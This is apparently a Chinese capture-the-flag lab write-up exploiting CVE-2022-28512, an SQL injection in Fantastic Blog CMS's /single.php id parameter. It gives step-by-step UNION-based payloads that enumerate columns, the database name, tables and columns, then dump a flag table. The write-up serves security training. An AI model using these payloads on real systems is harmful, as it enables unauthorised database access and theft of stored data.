春秋云境——CVE-2022-28512

靶标介绍:

Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。

1. 初始访问测试

正常请求文章接口,页面正常返回文章内容:

?id=5

2. 注入类型判断

尝试单引号闭合测试,页面报错/内容异常,证明参数被单引号包裹,为字符型注入,而非初始判断的数字型注入。

3. 查询字段数探测(Order By)

通过 order by 逐级猜测查询字段数量,最终确认该查询语句共 9个字段,只有字段数量一致,联合查询才能正常执行。

4. 显式回显位探测

使用负数id闭合,规避原有文章数据干扰,探测页面回显位置:

复制代码
?id=-5' union select 1,2,3,4,5,6,7,8,9--+

测试得出页面可正常回显查询数据,具备Union联合查询条件

5. 查询当前数据库名

database() 放置回显位,获取当前网站数据库名称:

复制代码
?id=-5' union select 1,2,3,database(),5,6,7,8,9--+

6. 爆表名(当前数据库所有数据表)

使用 group_concat() 函数解决页面Limit单行限制,一次性拼接输出所有表名,避免数据截断遗漏:

如果出现多行只显示一张表(limit 限制)

使用 group_concat() 拼接所有表,一次性全部输出

复制代码
?id=-5' union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=database()--+

7. 爆列名(查询数据表字段)

以核心用户表flag,

复制代码
?id=-5' union select 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name='flag'--+

8.读取flag专属表数据

复制代码
?id=-5' union select 1,group_concat(flag),3,4,5,6,7,8,9 from flag--+
相关推荐
九皇叔叔3 小时前
【第二章】Redis基础入门:Redis是什么、为什么快以及核心特性详解
数据库·redis·缓存
云和恩墨3 小时前
删库不跑路,回滚极速触达——zData S“旁路日志”持续保护原理深剖
数据库
hz567893 小时前
音视频 SDK在行政执法的应用方案:实现执法全过程音视频留痕
安全·实时音视频·信息与通信
MetaLite4 小时前
SpringBoot接口分层规范-外网网关内部服务与参数边界
java·数据库·spring boot
凤山老林4 小时前
聊聊企业级 API 安全:Spring Boot 落地 OAuth 2.1、mTLS 与接口签名防篡改
spring boot·后端·安全·oauth
Wang's Blog5 小时前
Java框架快速入门: Spring Security+OAuth2之元注解简化权限表达式
java·数据库·spring
天空之城--6 小时前
Android逆向安全合规接单指南
android·安全
蓝速科技7 小时前
医院导诊 AI 数字人一体机场景适配与落地指南丨蓝速科技
运维·数据库·人工智能·科技·自然语言处理·技术分享
QYR-分析7 小时前
重轨受电弓行业深度报告:市场格局、技术迭代与发展前景
大数据·数据库·人工智能
泡泡鱼(敲代码中)8 小时前
MySQL基础学习笔记:从数据模型到DDL全掌握
开发语言·数据库·笔记·学习·mysql